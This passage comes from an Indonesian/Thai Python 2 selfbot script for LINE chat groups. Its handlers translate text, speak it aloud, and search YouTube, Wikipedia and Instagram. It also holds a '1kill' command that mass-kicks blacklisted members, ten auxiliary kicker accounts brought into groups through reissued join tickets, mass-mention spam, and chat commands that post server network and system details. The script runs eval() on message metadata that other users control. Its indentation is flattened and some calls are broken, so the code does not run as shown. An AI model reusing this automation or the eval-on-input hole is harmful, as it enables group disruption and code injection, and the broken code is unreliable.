request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO ENGLISH----\n" + "" + result + "\n------SUKSES-----")
elif "En@id" in msg.text:
bahasa_awal = 'en'
bahasa_tujuan = 'id'
kata = msg.text.replace("En@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM EN----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@jp" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ja'
kata = msg.text.replace("Id@jp ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO JP----\n" + "" + result + "\n------SUKSES-----")
elif "Jp@id" in msg.text:
bahasa_awal = 'ja'
bahasa_tujuan = 'id'
kata = msg.text.replace("Jp@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM JP----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@th" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'th'
kata = msg.text.replace("Id@th ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO TH----\n" + "" + result + "\n------SUKSES-----")
elif "Th@id" in msg.text:
bahasa_awal = 'th'
bahasa_tujuan = 'id'
kata = msg.text.replace("Th@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM TH----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@jp" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ja'
kata = msg.text.replace("Id@jp ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO JP----\n" + "" + result + "\n------SUKSES-----")
elif "Id@ar" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ar'
kata = msg.text.replace("Id@ar ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO AR----\n" + "" + result + "\n------SUKSES-----")
elif "Ar@id" in msg.text:
bahasa_awal = 'ar'
bahasa_tujuan = 'id'
kata = msg.text.replace("Ar@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM AR----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@ko" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ko'
kata = msg.text.replace("Id@ko ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO KO----\n" + "" + result + "\n------SUKSES-----")
elif "Ko@id" in msg.text:
bahasa_awal = 'ko'
bahasa_tujuan = 'id'
kata = msg.text.replace("Ko@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM KO----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif msg.text.lower() == 'welcome':
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
jawaban1 = ("ยินดีต้อนรับเข้าสู่กลุ่ม " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
tts = gTTS(text=jawaban1, lang='th')
tts.save('hasil.mp3')
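# NOTE: a local filename is passed to sendAudioWithUrl here (and in the
# Say-*/Kapan/Apakah handlers below), although the name suggests the helper
# expects a URL; whether this works depends on the LINE client library used.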
cl.sendAudioWithUrl(msg.to,'hasil.mp3')
elif "Say-id " in msg.text:
say = msg.text.replace("Say-id ","")
lang = 'id'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudioWithUrl(msg.to,"hasil.mp3")
elif "Say-en " in msg.text:
say = msg.text.replace("Say-en ","")
lang = 'en'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudioWithUrl(msg.to,"hasil.mp3")
elif "Say-jp " in msg.text:
say = msg.text.replace("Say-jp ","")
lang = 'ja'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudioWithUrl(msg.to,"hasil.mp3")
elif "Say-ar " in msg.text:
say = msg.text.replace("Say-ar ","")
lang = 'ar'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudioWithUrl(msg.to,"hasil.mp3")
elif "Say-ko " in msg.text:
say = msg.text.replace("Say-ko ","")
lang = 'ko'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudioWithUrl(msg.to,"hasil.mp3")
elif "Kapan " in msg.text:
tanya = msg.text.replace("Kapan ","")
jawab = ("kapan kapan","besok","satu abad lagi","Hari ini","Tahun depan","Minggu depan","Bulan depan","Sebentar lagi")
jawaban = random.choice(jawab)
tts = gTTS(text=jawaban, lang='id')
tts.save('tts.mp3')
cl.sendAudioWithUrl(msg.to,'tts.mp3')
elif "Apakah " in msg.text:
tanya = msg.text.replace("Apakah ","")
jawab = ("Ya","Tidak","Mungkin","Bisa jadi")
jawaban = random.choice(jawab)
tts = gTTS(text=jawaban, lang='id')
tts.save('tts.mp3')
cl.sendAudioWithUrl(msg.to,'tts.mp3')
elif '#dy ' in msg.text:
try:
textToSearch = (msg.text).replace('#dy ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
ght = ('https://www.youtube.com' + results['href'])
cl.sendVideoWithUrl(msg.to, ght)
except:
cl.sendText(msg.to,"Could not find it")
elif 'mp4 ' in msg.text:
try:
textToSearch = (msg.text).replace('mp4 ',"").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
ght = ('https://www.youtube.com' + results['href'])
cl.sendVideoWithUrl(msg.to, ght)
except:
cl.sendText(msg.to, "Could not find it")
elif "Lirik " in msg.text:
try:
songname = msg.text.lower().replace("Lirik ","")
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
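# the joox endpoint returns a JSON list of songs; judging by the indices used
# here and in the Music handler: [0]=title, [1]=duration, [4]=download link,
# [5]=lyrics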
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
cl.sendText(msg.to, hasil)
except Exception as wak:
cl.sendText(msg.to, str(wak))
elif "/vk " in msg.text:
try:
wiki = msg.text.lower().replace("/vk ","")
wikipedia.set_lang("th")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
elif "Music " in msg.text:
try:
songname = msg.text.lower().replace("Music ","")
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'This is Your Music\n'
hasil += 'Judul : ' + song[0]
hasil += '\nDurasi : ' + song[1]
hasil += '\nLink Download : ' + song[4]
cl.sendText(msg.to, hasil)
cl.sendText(msg.to, "Please Wait for audio...")
cl.sendAudioWithUrl(msg.to, song[4])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif "#Image " in msg.text:
search = msg.text.replace("Image ","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
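# scrape the Google Images results page and send one random image URL from it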
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
cl.sendImageWithUrl(msg.to,path)
except:
pass
elif "#ค้นหารูปภาพ:" in msg.text:
search = msg.text.replace("ค้นหารูปภาพ:","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
cl.sendImageWithUrl(msg.to,path)
except:
pass
elif "#Profileig " in msg.text:
try:
instagram = msg.text.replace("#Profileig ","")
response = requests.get("https://www.instagram.com/"+instagram+"?__a=1")
data = response.json()
namaIG = str(data['user']['full_name'])
bioIG = str(data['user']['biography'])
mediaIG = str(data['user']['media']['count'])
verifIG = str(data['user']['is_verified'])
usernameIG = str(data['user']['username'])
followerIG = str(data['user']['followed_by']['count'])
profileIG = data['user']['profile_pic_url_hd']
privateIG = str(data['user']['is_private'])
followIG = str(data['user']['follows']['count'])
link = "Link: " + "https://www.instagram.com/" + instagram
text = "Name : "+namaIG+"\nUsername : "+usernameIG+"\nBiography : "+bioIG+"\nFollower : "+followerIG+"\nFollowing : "+followIG+"\nPost : "+mediaIG+"\nVerified : "+verifIG+"\nPrivate : "+privateIG+"" "\n" + link
cl.sendImageWithUrl(msg.to, profileIG)
cl.sendText(msg.to, str(text))
except Exception as e:
cl.sendText(msg.to, str(e))
elif "Checkdate " in msg.text:
tanggal = msg.text.replace("Checkdate ","")
r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
cl.sendText(msg.to,"============ I N F O R M A S I ============\n"+"Date Of Birth : "+lahir+"\nAge : "+usia+"\nUltah : "+ultah+"\nZodiak : "+zodiak+"\n============ I N F O R M A S I ============")
elif msg.text in ["Time","เวลา"]:
timeNow = datetime.now()
timeHours = datetime.strftime(timeNow,"(%H:%M)")
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["วันอาทิต์", "วันจันทร์", "วันอังคาร", "วันพุธ", "วันพฤหัสบดี", "วันศุกร์", "วันเสาร์"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
inihari = datetime.today()
hr = inihari.strftime('%A')
bln = inihari.strftime('%m')
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
bln = bulan[int(bln) - 1]
rst = hasil + ", " + inihari.strftime('%d') + " - " + bln + " - " + inihari.strftime('%Y') + "\nเวลาขณะนี้ : [ " + inihari.strftime('%H:%M:%S') + " ]"
cl.sendText(msg.to, rst)
#========================================================#
elif msg.text.lower() == 'ifconfig':
botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===")
elif msg.text.lower() == 'system':
botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
elif msg.text.lower() == 'kernel':
botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
elif msg.text.lower() == 'cpu':
botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
elif msg.text in ["Pmcheck","เชคดำ","เช็คดำ"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Tidak Ada Blacklist")
else:
cl.sendText(msg.to,"Daftar Banlist")
num=1
msgs="══════════List Blacklist═════════"
for mi_d in wait["blacklist"]:
msgs+="\n[%i] %s" % (num, cl.getContact(mi_d).displayName)
num=(num+1)
msgs+="\n══════════List Blacklist═════════\n\nTotal Blacklist : %i" % len(wait["blacklist"])
cl.sendText(msg.to, msgs)
elif msg.text in ["Mcheckcontact","Cb"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Tidak Ada Blacklist")
else:
cl.sendText(msg.to,"Daftar Blacklist")
h = ""
for i in wait["blacklist"]:
h = cl.getContact(i)
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': i}
cl.sendMessage(M)
elif msg.text in ["Midban","Mid ban"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list += filter(lambda mid: mid == tag, gMembMids)
num=1
cocoa = "══════════List Blacklist═════════"
for mm in matched_list:
cocoa+="\n[%i] %s" % (num, mm)
num=(num+1)
cocoa+="\n═════════List Blacklist═════════\n\nTotal Blacklist : %i" % len(matched_list)
cl.sendText(msg.to,cocoa)
elif msg.text.lower() == '1kill':
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list += filter(lambda mid: mid == tag, gMembMids)
if matched_list == []:
ki1.sendText(msg.to,"Tidak ada Daftar Blacklist")
return
for jj in matched_list:
try:
ki1.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#==============================================#
elif msg.text in ["in on"]:
if msg.from_ in admin:
if wait["pautoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["pautoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["in off"]:
if msg.from_ in admin:
if wait["pautoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["pautoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif "/ตัส" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,"[name]\n" + contact.displayName + "\n[mid]\n" + contact.mid + "\n[statusmessage]\n" + contact.statusMessage + "\n[profilePicture]\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[homePicture]\n" + str(cu))
except:
cl.sendText(msg.to,"[name]\n" + contact.displayName + "\n[mid]\n" + contact.mid + "\n[statusmessage]\n" + contact.statusMessage + "\n[homePicture]\n" + str(cu))
#=============================================
elif msg.text in ["!Sp"]:
start = time.time()
cl.sendText(msg.to, "Waiting...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sTamii Server" % (elapsed_time))
# ----------------- BAN MEMBERS BY TAG (2 OR 10 TAGGED MEMBERS)
elif ("Bl " in msg.text):
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes Banned Bos")
except:
pass
#------------- Respond Function Start ---------------------#
elif msg.text in ["#Cinvite"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact 😉")
elif "Gift @" in msg.text:
_name = msg.text.replace("Gift @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentType = 2
msg.contentMetadata={'PRDID': '89131c1a-e549-4bd5-9e60-e24de0d2e252',
'PRDTYPE': 'THEME',
'MSGTPL': '10'}
msg.text = None
cl.sendMessage(msg)
cl.sendText(msg.to, "Done...")
elif msg.text in ["Mchecky"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"nothing")
else:
cl.sendText(msg.to,"Blacklist user\nมีบัญชีดำของคุณอยู่กลุ่มนี้")
xname = ""
for mi_d in wait["blacklist"]:
xname = cl.getContact(mi_d).displayName + ""
xlen = str(len(xname)+1)
msg.contentType = 0
msg.text = "@"+xname+" "
msg.contentMetadata ={'MENTION':'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(mi_d)+'}]}','EMTVER':'4'}
try:
cl.sendMessage(msg)
except Exception as error:
print error
elif msg.text in ["Name me","Men"]:
G = cl.getProfile()
X = G.displayName
cl.sendText(msg.to,X)
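# The siri/พูด handlers below call a Google Translate TTS proxy; the final
# redirected URL (r.url) is what gets sent as the audio attachment.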
elif "siri " in msg.text.lower():
query = msg.text.lower().replace("siri ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'https://google-translate-proxy.herokuapp.com/api/tts'
params = {'language': 'th', 'speed': '1', 'query': query}
r = s.get(url, params=params)
mp3 = r.url
cl.sendAudioWithUrl(msg.to, mp3)
elif "siri:" in msg.text.lower():
query = msg.text.lower().replace("siri:","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'https://google-translate-proxy.herokuapp.com/api/tts'
params = {'language': 'th', 'speed': '1', 'query': query}
r = s.get(url, params=params)
mp3 = r.url
cl.sendAudioWithUrl(msg.to, mp3)
elif "siri-en " in msg.text.lower():
query = msg.text.lower().replace("siri-en ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'https://google-translate-proxy.herokuapp.com/api/tts'
params = {'language': 'en', 'speed': '1', 'query': query}
r = s.get(url, params=params)
mp3 = r.url
cl.sendAudioWithUrl(msg.to, mp3)
elif "พูด " in msg.text.lower():
query = msg.text.lower().replace("พูด ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'https://google-translate-proxy.herokuapp.com/api/tts'
params = {'language': 'th', 'speed': '1', 'query': query}
r = s.get(url, params=params)
mp3 = r.url
cl.sendAudioWithUrl(msg.to, mp3)
elif msg.text in ["คิก1","K1"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki1.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki1.updateGroup(G)
elif msg.text in ["คิก2","K2"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki2.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki2.updateGroup(G)
elif msg.text in ["คิก3","K3"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki3.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki3.updateGroup(G)
elif msg.text in ["คิก4","K4"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki4.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki4.updateGroup(G)
elif msg.text in ["คิก5","K5"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki5.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki5.updateGroup(G)
elif msg.text in ["คิก6","K6"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki6.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki6.updateGroup(G)
elif msg.text in ["คิก7","K7"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki7.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki7.updateGroup(G)
elif msg.text in ["คิก8","K8"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki8.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki8.updateGroup(G)
elif msg.text in ["คิก9","K9"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki9.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki9.updateGroup(G)
elif msg.text in ["คิก10","K10"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki10.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki10.updateGroup(G)
elif '/w ' in msg.text.lower():
try:
wiki = msg.text.lower().replace("/w ","")
wikipedia.set_lang("th")
pesan="Wikipedia : "
pesan+=wikipedia.page(wiki).title
pesan+="\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Text Terlalu Panjang Silahkan Click link di bawah ini\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
elif "/go " in msg.text:
tanggal = msg.text.replace("/go ","")
r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
cl.sendText(msg.to,"Tanggal Lahir : "+lahir+"\n\nUmur : "+usia+"\n\nUltah : "+ultah+"\n\nZodiak : "+zodiak)
elif "declined" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.leaveGroup(msg.to)
except:
pass
elif "[Auto] " in msg.text:
msg.contentType = 13
_name = msg.text.replace("[Auto] ","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentMetadata = {'mid': g.mid}
cl.sendMessage(msg)
else:
pass
elif "☜ʕ•ﻌ•ʔ " in msg.text:
msg.contentType = 13
_name = msg.text.replace("☜ʕ•ﻌ•ʔ ","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentMetadata = {'mid': g.mid}
cl.sendMessage(msg)
else:
pass
if op.type == 25:
msg = op.message
if msg.text.lower() in ["pheytcg fgtagg all"]:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
jml = len(nama)
if jml > 500:
    cl.sendText(msg.to,'Member melebihi batas.')
else:
    # mention members in chunks of 100; the original hand-unrolled ranges
    # skipped indices 100/200/300/400 and missed counts of exactly 200-500
    for i in range(0, jml, 100):
        mention(msg.to, nama[i:i + 100])
cnt = Message()
cnt.text = "PHET TAG DONE : " + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
if op.type == 26:
msg = op.message
if msg.text.lower() in ["1123"]:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
jml = len(nama)
if jml > 500:
    cl.sendText(msg.to,'Member melebihi batas.')
else:
    # mention members in chunks of 100; the original hand-unrolled ranges
    # skipped indices 100/200/300/400 and missed counts of exactly 200-500
    for i in range(0, jml, 100):
        mention(msg.to, nama[i:i + 100])
cnt = Message()
cnt.text = "PHET TAG DONE : " + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
elif msg.text in ["คท"]:
cl.sendText(msg.to,"😆เช็คจัง กลัวบอทหลุด ล่ะสิ😆")
elif msg.text in ["เทสบอท"]:
